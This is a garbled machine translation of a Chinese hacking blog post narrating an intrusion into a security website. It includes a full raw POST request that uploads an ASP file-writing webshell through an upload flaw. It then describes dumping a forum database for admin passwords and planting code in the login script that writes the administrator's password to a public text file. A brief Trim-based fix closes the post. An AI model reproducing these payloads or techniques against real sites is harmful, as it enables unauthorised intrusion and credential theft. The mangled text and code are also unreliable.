I am like this to enter a hacking site.

xiaoxiao2021-03-06 41

Source: Evil octal Chinese author of the article: evil cat [EST] (EvilCat [EST]) recent holiday at home, nothing, more time online, today rolled to the likes of several security sites, the new site Good articles are giving everyone to the EST forum (嘻). It's also idle, simply in the friendship of these sites, can I do any new thing. Ok, let's take a look at this friendly connection. Well, the website's beauty is not bad, look at the article, there is nothing to do so. Just leave this site, find this site's page system is very familiar, like a powerful article system, huh, look at the bottom of the page, "Powered by: fp3.6 sp2" halo ~~ Fruit is really guess, It is a free power article system. There is also a DVBBS7.0SP2 on the site. For professional problems, I am interested in this site ••••••••, register a account in the free-motivational article system. I entered the user control panel to see, I don't say everyone, I should know what I want to do •••••• Upload, huh. Look at the location of the upload software, "Sorry, this site is not allowed to upload", but also as a hacking site to upload vulnerabilities. I remember that I have sent a "breakthrough power article upload vulnerability" in the hacker X archive period, the article shows that we can upload an ASP Trojan with a Post attack in the case of prohibiting registered users. In this case, is this type of attack? Well, try it. I will submit this page http://www.xxx.com/upload_soft.asp page Return "Sorry, this website is not allowed to be uploaded!" We will submit "http://www.xxx.com/upfile_soft.asp page Back "Please select the file you want to upload!" "Haha, this shows that the POST's content can be submitted with NC. The POST is of course ASP Trojan. From now on, the chance of success is only 50% because the other party will repair upload vulnerabilities, even if posts are definitely , The file format is wrong. I found a data package that I used to use the free power to go to the vulnerability, and then submit it with NC, 嘻嘻, upload is successful. About the revision of the datagram and the use of the upload vulnerability, I miss me You don't have to say it over again. Everyone should be very skilled. Below the POST past data report: Code: post /upfile_soft.asp http / 1.1

Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, application / x-shockwave-flash, application / vnd.ms-power, application / vnd.ms-powerpoint, application / msword, * / *

Referr: [URL] http://www.xxx.com/upload_soft.asp [/ url]

Accept-language: zh-cn

Content-Type: Multipart / Form-Data; Boundary = --------------------------- 7D531C25440A0C

Accept-encoding: Gzip, deflate

User-agent: mozilla / 4.0 (compatible; msie 6.0; windows NT 5.1; sv1; maxth); .NET CLR 1.1.4322)

Host: [URL] www.xxx.com [/ url]

Content-Length: 1497Connection: Keep-alive

Cache-Control: No-cache

Cookie: aspsessionidqscqsada = iceejphaljlebhkfiojdplod; 831225 = cookiedate = 1 & password = 635d6ca36de2ff6f & userlevel = 999 & username = cat;

---------------------------- 7D531C25440A0C

Content-disposition: form-data; name = "filename"; filename = "c: / documents and settings / e.cat / desktop / injection / mm.asp .rar"

Content-Type: Text / Plain

<% DIM OBJFSO%>

<% DIM FDATA%>

<% DIM ObjcountFile%>

<% on error resume next%>

<% Set objfso = server.createObject ("scripting.filesystemObject")%>

<% IF Trim (Request ("SyfdPath")) <> "" "" "

<% fdata = request ("cyfddata")%>

<% Set objcountfile = objfso.createtextfile (Request ("SyfdPath"), TRUE)%>

<% objcountfile.write fdata%>

<% IF ERR = 0 THEN%>

<% response.write save success! %>

<% ELSE%>

<% response.write " save unsuccess! "%>

<% end if%>

<% err.clear%>

<% end if%>

<% ObjcountFile.close%>

<% Set objcountfile = Nothing%>

<% Set objfso = NOTHING%>

<% Response.write "

"%>

Save File Absolute Path (including file name: D: /web/x.asp): "%>

<% Response.write "%>

<% Response.write "
"%>

<% Response.write "This file absolute path"%>

<% = server.mappath (Request.ServerVariables ("script_name"))%>

<% Response.write "
"%> <% response.write "input horse content:"%>

<% Response.write " </ textarea>"%></p> <p><% Response.write <input type = submit value = save> "%></p> <p><% Response.write "</ form>"%></p> <p>---------------------------- 7D531C25440A0C</p> <p>Content-disposition: form-data; name = "Submit"</p> <p>Upload</p> <p>---------------------------- 7D531C25440A0C-</p> <p>[Ctrl A SELECT All] Writes with the submitted Trojan and then writes a marine 2005, see what the website is like, the permissions are locked, only on the website directory, the cmd command can not be executed, Hull •••••••• No matter how much, isn't you still see a DVBBS7.0SP2, first download the database down. After downloading, use the database auxiliary browser to see, you can see that XXXX is an administrator of the forum in the page, you can see that the forum's front desk and the username and password in the DV_USER, Table, and DV_ADMIN tables are Different, then use the database browser to see the Content field in the DV_LOG table, the keyword password, check if there is a clear text administrator password, huh, fruit is really password, it is xxxxxx008, see it from the DV_USER table in the front desk. Name is the front desk administrator name is a 008 after the name of the administrator name of XXXX and the background. It is estimated that the front desk is secret. It is not a short. I use the MD5 converter to verify my guess, huh, huh, huh And I guess it, it seems that hazy haha is still lucky. It's better to know the password of DVBBS and the background of the background. If the Aspshell is lost in the future, you can go in the backup a shell. The following will take a look at the free power database, and the MD5 value of the administrator password in the administrator of the free power database is different, it seems that the administrator still has some security awareness. I guess a few, this time is not so good, I didn't guess. However, I have a way to get his password, analyze the source code of free power, it can be seen that the password verification is this file by admin_chklogin.asp, and we will then analyze. The part of the file is as follows: Code: username = replace (TRIM (Request ("UserName"), "'", "")</p> <p>Password = Replace (TRIM (Request ("Password"), "'", "")</p> <p>Checkcode = Replace (Trim (Request ("Checkcode"), "'", "")</p> <p>IF username = "" "</p> <p>Founderr = TRUE</p> <p>Errmsg = errmsg & "<br> <li> User name can not be empty! </ Li>" endiff</p> <p>if Password = "" "</p> <p>Founderr = TRUE</p> <p>Errmsg = errmsg & "<br> <li> password cannot be empty! </ Li>"</p> <p>END IF</p> <p>if Checkcode = "" ""</p> <p>Founderr = TRUE</p> <p>Errmsg = errmsg & "<br> <li> Verification code cannot be empty! </ Li>"</p> <p>END IF</p> <p>IF session ("Checkcode") = "" "" "</p> <p>Founderr = TRUE</p> <p>Errmsg = errmsg & "<br> <li> You log in too long, please re-return the login page for login. </ Li>"</p> <p>END IF</p> <p>IF CHECKCODE <> CSTR (Session ("Checkcode"))</p> <p>Founderr = TRUE</p> <p>Errmsg = errmsg & "<br> <li> You entered the confirmation code and the inconsistency generated, please re-enter. </ Li>"</p> <p>END IF</p> <p>IF Founderr <> True Then</p> <p>Password = MD5 (Password)</p> <p>SQL = "SELECT * from admin where password = '" & password & "' and username = '" & username & "'"</p> <p>SET RS = NT2003.EXECUTE (SQL)</p> <p>IF rbof and rs.eof the</p> <p>Founderr = TRUE</p> <p>Errmsg = errmsg & "<br> <li> username or password error !!! </ li>"</p> <p>Else</p> <p>IF Password <> RS ("Password") THEN</p> <p>Founderr = TRUE</p> <p>Errmsg = errmsg & "<br> <li> username or password error !!! </ li>"</p> <p>Else</p> <p>nt2003.execute ( "update Admin set LastLoginIP = '" & Request.ServerVariables ( "REMOTE_ADDR") & "', LastLoginTime = '" & now & "', LoginTimes = LoginTimes 1 Where username = '" & username & "'")</p> <p>Session.Timeout = ClNG (NT2003.Site_Setting (15))</p> <p>Session ("adminName") = username</p> <p>Rs.close</p> <p>SET RS = Nothing</p> <p>Response.Redirect "admin_index.asp"</p> <p>END IFEND IF</p> <p>Rs.close</p> <p>SET RS = Nothing</p> <p>END IF</p> <p>if Founderr = True Then</p> <p>Call writeerrmsg ()</p> <p>END IF</p> <p>[Ctrl A Select All] It can be seen that some basic errors are not found to find both FOUNDERR <> true, and the program converts the password entered into MD5 and then handed over to the database. Ok, we will code this code: DIM FSOOBJECT</p> <p>Dim tsobject</p> <p>Set fsoobject = server.createObject ("scripting.filesystemObject")</p> <p>Set tsobject = fsoobject.createtextfile (Server.MAppath ("Cat.txt")) TSObject.write CSTR (Request ("password"))</p> <p>Set fsoobject = Nothing</p> <p>Set tsobject = Nothing</p> <p>[Ctrl a SELECT All] Insert to Code: if Password <> RS ("Password") THEN</p> <p>Founderr = TRUE</p> <p>Errmsg = errmsg & "<br> <li> username or password error !!! </ li>"</p> <p>Else</p> <p>[Ctrl a select all], the role administrator once logged in, and writes the administrator's password to CAT.TXT. We browsed the password of the http://www.xxx.com/cat.txt administrator, huh, huh, huh. Although this idea is not my original but use this method to use it in free and power is the first. In fact, there is a friend back to say that we have why I am still so interested in the user's password, 嘿嘿, the administrator's QQ and E-mail and even his FTP and so on, the same is the same as one of them ••• •••••••••Le not to do this, I just do a test ••••• So everyone's password is best not to use. I have a good invasion and tell a fall, and the improvement permissions are the next thing. I want to analyze why I can perform POST attacks. The reason for this success is caused by two aspects, one is the possibility of free power program to POST attack, and the other is that the program has upload vulnerabilities. Fundamentally concurrently or upload vulnerabilities. Here is a analysis of the first question: We start submit this page http://www.xxx.com/upload_soft.asp, return "Sorry, this website does not allow uploading the file!" Let's see UPLOAD_SOFT.ASP Part of the source code: Code: <%</p> <p>IF NT2003.SITE_SETTING (7) = 1 THEN</p> <p>%></p> <p><form action = "upfile_soft.asp" method = "post" name = "form1" onSubmit = "Return Check ()" ENCTYPE = "Multipart / Form-Data"></p> <p><Input Name = "filename" type = "file" class = "tx1" size = "40"></p> <p><Input Type = "Submit" Name = "Submit" Value = "Upload" Style = "Border: 1px Double RGB (88, 88, 88); Font: 9pt"> </ form></p> <p><%</p> <p>Else</p> <p>"Sorry, this website is not allowed to be uploaded!"</p> <p>END IF</p> <p>%></p> <p>[Ctrl a SELECT All] We noticed if nt2003.site_setting (7) = 1 Then there will be a form of uploaded. Let's submit http://www.xxx.com/upfile_soft.asp page back "Please select the file you want to upload!" We look at the partial_soft.asp partial source code: Code: <%</p> <p>NT2003.Getsite_Setting ()</p> <p>const upload_type = 0 'Upload Method: 0 = No fear and no component upload, 1 = FSO upload 2 = lyfupload, 3 = aspupload, 4 = Chinaaspupload</p> <p>const saveupfilespath = "Uploadsoft"</p> <p>Const Upfiletype = "RAR | ZIP | EXE | MPG | RM | WAV | MID"</p> <p>Nt2003.site_setting (7) = 1 'Note here! ! ! !</p> <p>Const maxFilesize = 102400</p> <p>•••••••••••••••</p> <p>Sub Upload_0 () 'uses the border unbounded</p> <p>SET UPLOAD = New Upfile_class' Establishing Upload Objects</p> <p>UPLOAD.GETDATA (104857600) 'get uploaded data, limit maximum upload 100M</p> <p>If UPLOAD.ERR> 0 TEN 'If an error</p> <p>SELECT CASE UPLOAD.ERR</p> <p>Case 1</p> <p>Response.write "Please select the file you want to upload!"</p> <p>Case 2</p> <p>Response.write "The total size of the file you upload is exceeded for maximum limit (100M)"</p> <p>End SELECT</p> <p>Response.end</p> <p>END IF</p> <p>[Ctrl A SELECT All] Direct access UPFILE_SOFT.ASP will prompt us to select the upload file so that our Post has not been OK. And free power does not check the user's cookie when the user is uploaded, this is dangerous. BBSGOOD is good, although bbsgood has upload vulnerabilities, but the official website does not open upload function and is not black, it is because BBSGOOD is uploaded in the user's cookie, such as bbsgood is UPLOAD_ID. A section in the ASP is written: code: username = request.cookies ("username")</p> <p>Password = Request.cookies ("password")</p> <p>If Request.cookies ("login") = "y" and imageid> 0 THEN</p> <p>SET RS = conn.execute ("SELECT TOP 1 ID, User Name, Password, Permissions, Account Status from BBSGOOD_USER WHERE Username = '" & UserName & "'") IF (rs.bof and rs.eof) or rs ("password ") <> Password Then</p> <p>Response.write i 1 & "You do not have uploaded authority <br></p> <p>Else</p> <p>IF (imageid = 1 and (rs ("permission") = "author" = "bbsadmin")) or (imageid = 2 and rs ("permissions" = "admin") or (ImageID) = 3 and RS ("Permissions") = "bbsadmin") or ImageId = 4 THEN</p> <p>FILENAME = Savefile (FormfieldName, FilePath, MaxFileSize, SavType, Fsotype, ForbidType) 'Save and achieve the file name</p> <p>Else</p> <p>Response.write i 1 & "You do not have uploaded authority <br></p> <p>END IF</p> <p>END IF</p> <p>END IF</p> <p>[Ctrl a SELECT All] Oh, if this code I want to find the official website when the upload vulnerability is already black •••••• Below is the second question: I want to upload a vulnerability, everyone is not strange There are many articles for analyzing the cause of vulnerability. I still say this here. ASP (behind space) is not equal to ASP, and he will automatically remove space for Windows, he will automatically remove space, so when we upload an ASP file It will become an ASP file. But I found that the article on the repair of the upload vulnerability is really less, I have been searched for a long time in Google. I haven't found it. Use the broiler who go in to the upload vulnerability not to make the vulnerability how to make it, the general practices are deleted, which is really bad. In fact, we can use Trim function, below is the TRIM function in MSDN: Trim FunctionReturns a Copy of A String WITHOUTLETURNS A COPY A STRING WITHOUTLETURNS A COPY A STRING WITHOUT LEADING SPACES (LTRIM), Trailing Spaces (RTRIM), or Both Leading and Trailing Spaces (Trim) ) .LTrim (string) RTrim (string) Trim (string) The string argument is any valid string expression. If string contains Null, Null is returned. RemarksThe following example uses the LTrim, RTrim, and Trim functions to trim leading spaces, trailing spaces, and both leading and trailing spaces, respectively: Dim MyVarMyVar = LTrim ( "vbscript") 'MyVar contains "vbscript" .MyVar = RTrim ( "vbscript")' MyVar contains "vbscript" .MyVar = Trim ( "vbscript") 'Myvar Contains "VBScript". We know that free power is free to attack, reference to some code in upfile_class.asp with upload vulnerabilities: code: ofileinfo.filename = MID (sfilename, "/") 1) ofileinfo.filepath = left (sfilename, INSTRREV (sfilename, "/")))</p> <p>Ofileinfo.fileExt = MID (sfilename, INSTRREV (SFileName, ".") 1)</p> <p>[Ctrl a SELECT All] See it, there is no filter space, we can use the Trim function to do this: code: ofileinfo.filename = Trim (MID (SFileName, Instrrev (sfilename, "/") 1)))</p> <p>Ofileinfo.filepath = Trim (Left (SfileName, Instrrev (sfilename, "/")))))))</p> <p>Ofileinfo.fileExt = TRIM (MID (SfileName, Instrrev (SFileName, ".") 1))</p></div><div class="text-center mt-3 text-grey"> 转载请注明原文地址:https://www.9cbs.com/read-56970.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>) </div><div></div></div></div><ul class="postlist list-unstyled"> </ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="56970" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved </div><div class="col text-right">Processed: <b>0.038</b>, SQL: <b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'IKiJrNx_2FEQhY8lqbyM73rUG3cUyYc5fKXkrkgLp_2FaIMY0G846O7eVFcE5BRzOKk8nPu8EV1pOOMIt83RjsiIKg_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>